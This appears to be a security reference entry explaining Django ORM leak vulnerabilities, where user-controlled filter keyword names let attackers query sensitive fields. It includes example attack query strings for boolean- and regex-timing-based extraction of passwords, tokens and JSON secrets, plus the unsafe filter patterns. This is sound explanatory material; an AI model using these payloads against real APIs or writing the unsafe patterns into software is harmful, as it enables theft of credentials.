Vulnerabilities where Django ORM field lookups can be manipulated to leak sensitive data through startswith filters, JSON extraction, or regex timing.
Django ORM Leak refers to vulnerabilities where Django's ORM can be manipulated through query parameters to leak sensitive data, particularly through field lookups, JSON field access, or regex-based timing attacks.
Django resolves the keyword name of a filter argument itself: a double underscore in the name selects a related field, a JSON key or a lookup type (`field__lookup`). If the name comes from the client, the client chooses both which column is compared and how:

```python
# Django allows field lookups via double underscore.
# If the user controls the keyword name, they choose the column and the comparison:
User.objects.filter(**{user_input: value})
```

An attacker can then filter on fields the endpoint never meant to expose:

```
?filter=password__startswith=a
?filter=email__contains=admin
?filter=token__regex=^abc
```
With a JSONField the same mechanism reaches nested keys, so data stored inside the JSON value can be extracted or its structure enumerated:

```
# Extract a nested value
?filter=profile__secret_key__startswith=sk_
# Or enumerate structure
?filter=settings__has_key=api_key
```
Because the response reveals whether the filtered queryset is empty, a sensitive value can be recovered one character at a time (boolean-based), and where the result set is not shown directly, the time taken by a regex lookup can serve the same purpose (timing-based):

```
# Boolean-based extraction via filter existence
GET /api/users?password__regex=^a   # Returns results?
GET /api/users?password__regex=^b   # Returns results?

# Timing-based extraction
GET /api/users?password__regex=^a.* # Time the response
GET /api/users?password__regex=^b.* # Compare times
```
The vulnerable code patterns are those in which a request-controlled string ends up as the keyword name of a filter argument, either wholesale or by string formatting:

```python
# Dangerous: the user controls every filter field name and lookup type
Model.objects.filter(**request.GET.dict())

# Also dangerous: a user-controlled field name formatted into the lookup key
# (the user still chooses the column; only the lookup type is fixed)
Model.objects.filter(**{f"{field}__contains": value})
```